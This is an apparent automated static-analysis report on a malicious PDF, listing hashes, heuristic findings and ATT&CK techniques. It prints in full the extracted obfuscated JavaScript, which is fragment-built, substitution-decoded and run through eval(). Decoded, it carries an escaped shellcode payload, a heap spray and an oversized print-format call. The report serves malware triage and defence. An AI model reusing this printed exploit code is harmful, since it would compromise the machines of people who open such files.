Malicious PDF — malware analysis report

Static analysis result for SHA-256 93d159aa1289071f…

MALICIOUS

PDF

4.3 KB Created: 2008-09-07 22:47:39 Authoring application: Scribus 1.3.3.12 (via Scribus PDF Library 1.3.3.12) First seen: 2026-05-08
MD5: 4b973fd99de043edbc645753bde87e8d SHA-1: ce733f5154d3ed9fba5c19c35467599c84f4b83e SHA-256: 93d159aa1289071f25784c8ae7b05a9bffb09179da3984d42bb6efac4437824c
148 Risk Score

Malware Insights

MITRE ATT&CK
T1059.001 PowerShell T1059.007 JavaScript

The PDF file contains embedded JavaScript, as indicated by the PDF_JAVASCRIPT and PDF_JS heuristics. The high-severity PDF_EVAL heuristic fired, indicating a call to eval(), a technique commonly used to obfuscate malicious JavaScript. The extracted JavaScript artifact, javascript_obj0013_001.js, is flagged for script obfuscation: the matched line shows the script assembling a single string from many short fragments and applying several character-substitution replace() calls before passing the result to eval(), so the effective code exists only at runtime and is not visible to a plain string scan. The eval() call is likely used to decode and execute a secondary payload, a common malware delivery mechanism. No specific family could be identified because of the obfuscation.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 4

  • JavaScript action low 2 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
    Matched line in script
    H='f",n';R='Zm);';I='5000';A+=I+H+R;
    ;A=A.replace(/@/g,'8');A=A.replace(/!/g,'p');A=A.replace(/#/g,'%');A=A.replace(/Z/g,'u');eval(A);
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0013_001.js pdf-javascript-stream PDF /JS object 13 at offset 0x37A 6022 bytes
SHA-256: 473f4c1e6a36d6bf566618096ad0e87dcd4cf5faefb90c06b4992d1492782c68
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
A='';I='nes';M='e@#Z';W='#Z3d';T='Z00';S='c5@';H='1@b#Z';Q='b0#Z';F='0000';C='d00#Z';O='3#Z';Z='4530';X='#Z450';Y='b91';B='#Z5';G='ca!';U='ayloa';P='var !';R='d = Z';E='e("#';N='0#Z75';V='4#Z0';L='0000';A+=P+U+R+I+G+E+T+M+F+B+C+S+O+Y+V+H+L+W+Q+Z+X+N;
T='962#Z';R='dad';X='Z3dc1';K='49#Z';N='d3d';G='17d#';J='#Zad0';S='Zada';E='3d#';B='31#Z3';Q='d#Zd';C='Zb6';D='4ad#';F='d#Z45';H='ad#';Y='#Z3';Z='0#Za';M='0d9c#';P='Z3d3';O='#Zad';I='ebf9';W='#Z5';A+=K+I+J+Z+R+O+H+S+Q+D+X+Y+N+W+T+M+P+F+E+C+B+G;
H='Z55';O='Z3d3d';V='957#';S='635#';L='b6#Zd';U='#Z3';F='Zd56';Y='#Zc4';E='97d';R='021#';Z='Z4d';D='Zb6';Q='34#Z0';X='641';N='0#Zb';K='cab6';G='#Z01';P='b6#Z9';B='55#Z';I='4#Z';M='#Z7db';T='3db2#';A+=Z+P+R+H+L+S+D+Q+E+M+N+X+G+B+K+U+V+F+I+T+O+Y;
U='3d53#';B='d3d';V='4@#';W='Z5051';Z='#Zc2';G='69#';J='b6#Zb';C='02#';T='#Z3d';K='525';R='d7a';X='Z553d';M='5#Z';N='df#Z';O='#Zea';I='#Z4f';F='#Z3d';L='2b#';D='44#Z3';P='Zd5d5';Q='Zc74';E='Zb6';A+=N+K+M+U+X+I+V+W+Z+G+E+L+P+F+D+B+O+J+R+T+C+Q;
Q='#Z6';G='@#Z6';N='63d';Z='bcf4';B='a#Z3';C='ce1#Z';R='6e6f';E='Zd2';M='d1#Z';V='#Z3';X='bd7';S='#Z39';F='c#Zb';T='62#Z';O='c74@#';W='b6#';K='3d3';J='955';P='d02#Z';L='#Z3d3';Y='Z0e';U='a7a#Z';A+=G+U+X+B+P+O+E+W+Y+T+Z+S+M+K+F+N+Q+C+R+V+J+L;
F='d#Z4';J='3#Z';M='c23';L='bcc7';W='06b';D='5@1';B='4@#Z';Y='6c#';U='c#Z';R='Z3e';K='46#Z';N='5@45#';Q='#Zc1';S='@3d#Z';C='Z3fb6';G='b#Z64';X='d#Z';P='Z6f';T='316';V='#Z7e6';Z='e#Z';E='67#';A+=U+M+X+T+G+E+P+Y+C+V+Z+W+F+S+L+Q+K+D+J+N+R+B;
E='b766#';C='5@4';S='6d6d#';I='7e#Z5';X='e#Z';R='fb#Z3';B='e#Zc2';L='Z3d7@';Q='Z6a6';T='#Z39';U='Z39';Y='@13#Z';N='d35#Z';W='6d#Z2';G='fc#Z';J='fa3e';M='d6be';K='#Zfd0';Z='#Zb4';H='35#Z';O='5#Z7e';D='b50d#';A+=M+Z+H+J+T+I+Y+C+O+R+N+E+U+G+D+L+K+X+S+Q+B+W;
S='d6b#Z';J='e64#Z';D='c2#';G='Z01';X='4@#Z4';U='9#Zb';L='Z4@3d';K='b#Z';W='2#Z6c';I='#Z573';H='#Z6b';F='6e3c';E='b66b#';V='39ff#';Y='7c#Z';N='3d07#';C='Z673';R='c5be#';O='#Z6bc';P='Z@94@';B='Zbd';M='35#Z';A+=S+R+L+I+K+F+H+D+C+U+J+V+B+Y+N+P+O+W+M+E+G+X;
L='Z0e';M='9b6#Z';Q='Zf4';C='#Zf';T='Z1d4';H='Z2d';O='0e#Z';J='e#Zb6';D='b#Zc';V='2e6#';I='b07#';X='6fc#';N='@3e#';R='@3#Ze';Z='4513#';W='Zc@3';E='Z3e';G='6b#';F='90#';K='7c74#';B='f@#Z3';S='Z3549';A+=M+Z+W+J+G+T+D+N+Q+O+K+E+F+L+B+V+H+R+I+S+C+X;
M='3b6#';F='e03';T='Z196';R='6#Z';L='Zccd';P='e#Zb6';U='21#Zb';Q='6e0#';G='3#Z';B='b663#';K='Z3e30';I='#Z7d';Y='7631';D='#Zd';V='5b#Z';W='e7#';H='39#';S='Zb6';E='a4@#Z';C='Z3e';O='#Z6';J='2206';A+=K+I+W+L+R+J+D+E+B+T+G+F+P+V+Y+O+M+C+U+Q+S+H;
G='Zb7c';Z='b3c';P='Zf@';S='3e#Z';F='#Zc';V='337';D='0e4';U='fe64';L='6#Z';H='639';J='a5d1#';K='2#Z';R='333#';I='e#Z';E='3#Z';O='2d5';M='b7f';X='e5#Z';T='2c3#Z';N='3#Z4';Y='#Zc';W='Zdf';A+=P+S+H+L+U+Y+O+F+T+Z+K+V+E+J+G+N+R+W+X+D+I+M;
C='@12#';J='Z6c7';B='7#Z';D='66#Z';K='90e#Z';P='0b#';V='Z0f13';L='4d#';N='Z1305';H='3d4e#';G='Z4a';F='#Z501';R='9#Z12';Z='#Z0';Y='1227#';I='5#Z';W='4d4';S='0413';U='Z495';O='7#Z0b';X='07#Z0';T='#Z0@';A+=O+D+Y+G+L+J+B+H+U+I+W+R+X+C+N+T+P+V+Z+K+S+F;
C='#Z13';M='#Z0d0';E='5c#Z5';P='5b#Z';V='Z5@';K='0b#Z';B='Z550';J='#Z1';I='#Z5f0';U='2#Z';D='2#Z';N='a3d#Z';G='d#Z0d';Q='0400';L='4954';Z='0254#';O='0c0d';T='Z0405';R='959#';W='0d0a';H='252#';S='f#Z0';A+=D+L+J+H+B+U+Q+C+E+N+Z+T+I+S+R+V+K+O+M+G+P+W;
V='Z0d0d';U='#Z0d0';G='e0b#';D='0b0d#';O='#Z0d';R='9#Z0';J='Z0e04';Q='d0d#Z';L='@#Z0';W='d#Z0';K='0f0';X='0d0';C='#Z5c0';H='Z5c5';Y='c0e#';B='c5e#Z';Z='d#Z0d';S='Z5c04';N='#Z0f';E='0d#Z0';I='4#Z';T='0d#';A+=N+T+H+R+G+S+C+I+D+V+U+Z+E+Q+K+W+B+X+L+Y+J+O;
C='0d0d';S='@;iCn';E='for';P='d0d#';Y='0d#Z0';M='Z0d0d';R='0d#Z';X='c#Z';T='0c0d#';H='var n';G='3d0';O='Z0a0';I='t=12';Q='Z09';J='#Z0d';N='40d#';V=' (iCn';W='0d#Z';F='#Z0';B='d");';L='o! ';U='="";';A+=R+T+Q+Y+N+M+J+W+C+F+P+O+X+G+B+H+L+U+E+V+I+S;
H='k = ';D='loc';X='nt) ';C='t>=0;';W='090#';K=' Zn';V='90#Z9';B='#Z909';Q='no!';T='no! +';R='esc';L=' !ayl';I='Z90';J='oad;b';P='0");h';O='ea!b';U='--iC';F='090#';M=' +=';Z='Z909';E='0#Z9';G='a!e("';A+=C+U+X+Q+M+K+R+G+B+E+F+I+V+W+Z+P+O+D+H+T+L+J;
R='s!r';H='der';B='bloc';S=' = ';Y='igbl';C='090"';N='+hea!';Q='eng';T='k.l';J='= hea';W='size';O='Z90';G='20;';V=' Znes';K='ock =';X='der';P='("#';U='90#Z9';Z='size';E=');hea';L='ca!e';M='ay ';A+=Y+K+V+L+P+O+U+C+E+H+Z+S+G+R+M+J+X+W+N+B+T+Q;
Y='bigb';S='gth<';J='llbl';X='th;';U='while';T=' (b';G='y) b';H='igbl';F='ock ';Q='k;fi';D='gbloc';B='ing(';E='bstr';W='s!ra';V='loc';N='ock+=';K='= bi';C='.len';M='k.sZ';P='ock';I='igbl';L='0, ';A+=X+U+T+I+P+C+S+W+G+H+N+Y+V+Q+J+F+K+D+M+E+B+L;
E='ock';X='th+';G=' 0x';L='s!ray';N='th-s!';W='ay <';J='lock ';P='igbl';C='e(b';B='.leng';Q='ray);';D='lock';I=');b';S='block';T='s!r';K='whil';O='4000';Z='.sZbs';V='tring';F='= big';H='.leng';U='(0, b';A+=L+I+J+F+S+Z+V+U+P+E+H+N+Q+K+C+D+B+X+T+W+G+O;
E='i=0';L='();fo';G=';i<14';I='lock';Z=' bloc';C='m[i] ';X='r (';K='llbl';H='0) b';F='+fi';N='00;';T='w A';J='ock';B='loc';U='rray';M=';me';D='k =';O='i++';P=' ne';W='k+b';V=') me';Q='m =';A+=H+B+D+Z+W+I+F+K+J+M+Q+P+T+U+L+X+E+G+N+O+V+C;
D='var';Y='@@@@@';P='99999';G='lock ';H='@@@';C='9999';Z='+ hea';O='m = 1';M='= b';R='!bl';K='@@@@@';W='999';I='9@@@';U='999';E=' nZ';T='ock;';S='@@@@';N='@@@@';B='299';L='@@@@';X='@@@@@';F='@@@@@';A+=M+G+Z+R+T+D+E+O+B+P+W+C+U+I+X+H+N+F+K+Y+S+L;
Y='@@@@';F='@@@';G='@@@@@';R='@@@@';X='@@@@';O='@@@';H='@@@@';V='@@@';T='@@@@@';S='@@@';P='@@@@';D='@@@';B='@@@';W='@@@';L='@@@';N='@@@@@';E='@@@@';U='@@@@';C='@@@@';Z='@@@@@';I='@@@@@';J='@@@';A+=X+G+R+Z+T+Y+W+V+L+D+P+F+S+N+I+U+E+J+B+H+C+O;
C='@@@';V='@@@';G='@@@';Q='@@@@';M='@@@';H='@@@@';X='@@@@@';I='@@@';L='@@@@';W='@@@@@';N='@@@@';B='@@@@@';T='@@@';O='@@@';E='@@@@';Z='@@@@@';D='@@@@@';R='@@@@@';P='@@@@';U='@@@@@';S='@@@';F='@@@@@';A+=B+E+N+T+R+F+V+G+H+M+C+Q+Z+S+X+D+U+W+I+O+L+P;
Q='@@@';N='@@@';G='@@@';E='@@@@';S='@@@';O='l.!r';F='int';B='@@@@@';Z='Zti';W='@@@';I='@@@';U='@@@';M='@@@@';P='@@@';R='@@@@;';X='@@@@@';K='@@@';H='f("#4';D='@@@';V='@@@@@';J='@@@@';L='@@@@@';A+=G+E+P+L+D+X+Q+B+W+S+K+V+N+M+U+I+J+R+Z+O+F+H;
H='f",n';R='Zm);';I='5000';A+=I+H+R;
;A=A.replace(/@/g,'8');A=A.replace(/!/g,'p');A=A.replace(/#/g,'%');A=A.replace(/Z/g,'u');eval(A);